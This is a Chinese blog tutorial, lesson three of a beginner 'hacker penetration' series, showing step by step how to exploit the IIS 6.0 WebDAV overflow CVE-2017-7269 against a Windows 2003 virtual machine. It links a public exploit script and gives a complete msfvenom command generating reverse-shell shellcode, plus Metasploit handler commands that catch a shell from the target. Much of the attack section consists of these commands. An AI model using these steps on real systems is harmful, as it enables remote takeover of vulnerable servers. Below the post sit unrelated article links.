我们不一样的黑客渗透教程第三课,CVE20177269实战测试

很多人想学黑客知识,却不知如何入门,网上的教程也太繁琐,小白看了也头疼,那还是我来写黑客系列入门教程吧,跟着我做,你能黑客入门的。我已经写了两篇了,第1篇在

《我们不一样的黑客渗透教程第一课,粗暴的端口扫描》

,第2篇在《我们不一样的黑客渗透教程第二课,6行py写个端口扫描工具》。我就奇怪了,第1篇收藏量和关注量都极多,第2篇就没有人看了,难道我写的不是一个系列?今天第3篇教程,我们直接用CVE-2017-7269漏洞进行一次实战测试。三篇文章你融会贯通了,基本算黑客入门了。

微软方面也已经确认了该漏洞:Windows Server 2003R2版本IIS6.0的WebDAV服务中的ScStoragePathFromUrl函数存在缓存区溢出漏洞,远程攻击者通过以“If:

一、我们要准备的工具

python2.7版本,下载地址在https://www.python.org/downloads/。我第2课中示例的是python3.0,这个漏洞用python3.0发送字节流不方便,所以我们还是用python2.7。

pentestbox,记得下载安装有 Metasploit 的 PentestBox的版本,地址:https://pentestbox.org/zh/#download。

win2003服务器版的虚拟机。由于头条不让在文章里放种子之类的下载地址,我会在评论里写出这个下载地址。

CVE-2017-7269漏洞的测试代码,地址:https://github.com/edwardz246003/IIS_exploit/blob/master/exploit.py。

二、测试环境的搭建

安装Win2003虚拟机后,要配置一个iis6运行环境。在管理您的服务器当中,添加或删除角色中配置iis6运行环境,要注意勾选asp.net支持,否则你可能测试不会成功。

最后一步你开启webdav支持,这样一来你配置的测试环境就成功了。

三、测试一下我们的poc

我的python27安装目录在d:/python27,我们把第一步下载的exploit.py改名为CVE-2017-7269.py放在d:/python27目录。我安装的2003服务器版的虚拟机的ip为192.168.1.102,我本机的ip为192.168.1.100。

我们把CVE-2017-7269.py文件里的第6行改成要测试目标的ip地址,我这里直接改为192.168.1.102了。

直接运行d:/python27/python.exe d:/python27/CVE-2017-7269.py,虚拟机里的任务管理器进程中就会出现计算器进程了。

如果你运行错误(有这个可能),请用editplus能显示行号的编辑器把CVE-2017-7269.py第16行删掉。

四、改写shellcode,反弹shell。

这个poc只是运行一个计算器而已,并没有实战价值。我们改写CVE-2017-7269.py,反弹一个shell。当然,这里我不讲解这个漏洞的原理和形成过程,也不讲解poc的编写,如果你这两点都会,你已经是国内一流黑客大牛了。我们在本文只讲解如何改造poc进行实战。

运行pentestbox后,输入以下命令生成一个反弹到192.168.1.100的shellcode(我本机ip是192.168.1.100)。如果你是win10系统,记得打开pentestbox要先输一下cmd,再输入以下命令,其它系统直接输入就行:

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.1.100 lport=443 PrependMigrate=True PrependMigrateProc="calc.exe" EXITFUNC="process" -b "x00" -e x86/unicode_mixed BufferRegister=ESI -f raw

替换CVE-2017-7269.py文件里的shellcode。

复制你上边生成的shellcode,替换CVE-2017-7269.py文件里第13行shellcode的内容。

用Metasploit监听443端口。

打开pentestbox后,win10先输入cmd后,再依次输入以下命令,其它系统直接输入就行,一条命令一个回车:

msfconsole

use exploit/multi/handler

set payload windows/shell/reverse_tcp

set lport 443

set lhost 192.168.1.100

exploit

我们再在命令行里输入d:/python27/python CVE-2017-7269.py,那么你就会获得192.168.1.102的反弹shell了,直接进入192.168.1.102的机器了。

黑客渗透教程第3课内容有很多。有python27、win2003虚拟机、pentstbox的安装、虚拟机IIS6的安装和配置,还有用pentestbox生成我们需要的shellcode,以及CVE-2017-7269.py里的shellcode替换。内容虽然多,但是并不难,你照着我文章做是能成功的。如果你成功了,是否有一种我已经黑客入门了的满足感了呢?如果你在这其中遇到到了和文章内容不同的难题,欢迎在评论里提出,我会一一给大家回复的。黑客渗透教程第一季我准备只写4篇,从端口扫描、python配置、实战演练到最后一篇的细节补充就结束了。第二季黑客入门教程,我们换个角度再切入进去,敬请期待吧。

本文来自企鹅号 - 少女诚可贵媒体

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏hbbliyong

Windows 7笔记本创建wifi热点供手机上网教程

用智能手机的朋友会发现这样一个问题,智能手机比普通手机上网更耗流量。这是因为智能手机应用(软件)丰富,而且大部分应用都会自动联网。为此,许多人每月包了上百M的流...

3697
来自专栏编程

(4)Superset权限使用场景

如前文所述,Superset初始化权限之后,创建5个角色,分别为Admin,Alpha,Gamma,sql_lab以及Public。Admin,Alpha和Ga...

2.3K10
来自专栏三丰SanFeng

浅谈DNS

什么叫域名解析 域名解析是把域名指向网站空间IP,让人们通过注册的域名可以方便地访问到网站一种服务。IP地址是网络上标识站点的数字地址,为了方便记忆,采用域名来...

7757
来自专栏DeveWork

WordPress中借助.htaccess屏蔽某个IP或某个IP段(防垃圾评论)

最近本站DeveWork.com 老是被来自142.4.108.109这个ip的垃圾评论骚扰,看来之前的《代码实现 WordPress 反垃圾评论功能》用处还是...

22010
来自专栏FreeBuf

安全运维之如何找到隐匿于last和w命令中的ssh登录痕迹

*本文原创作者:ForrestX386,本文属FreeBuf原创奖励计划,未经许可禁止转载

1132
来自专栏晨星先生的自留地

提权(1)信息收集

3704
来自专栏沈唁志

一个PHP文件搞定微信H5支付

4.1K6
来自专栏知识分享

邪恶改装:TPYBoard制作廉价WIFI干扰器

转载请注明:@小五义http://www.cnblogs.com/xiaowuyi

2077
来自专栏idealclover的填坑日常

Ubuntu 18.04/16.04系统安装网易云音乐无法启动或安装解决方案

由于netease-cloud-music_1.1.0_amd64_ubuntu.deb打包可能有问题,在Ubuntu 16.04/18.04版本中虽然可以安装...

9073
来自专栏张戈的专栏

SEO分享:让百度删除不想收录的域名或快照的最快方法

个别网站可能会出现以下类似困扰: ①、百度收录了自己不想收录的域名,造成内容重复,比如张戈博客,百度近一半的收录是 www 的域名,而且收录的内容还是重复的!实...

1K7

扫码关注云+社区

领取腾讯云代金券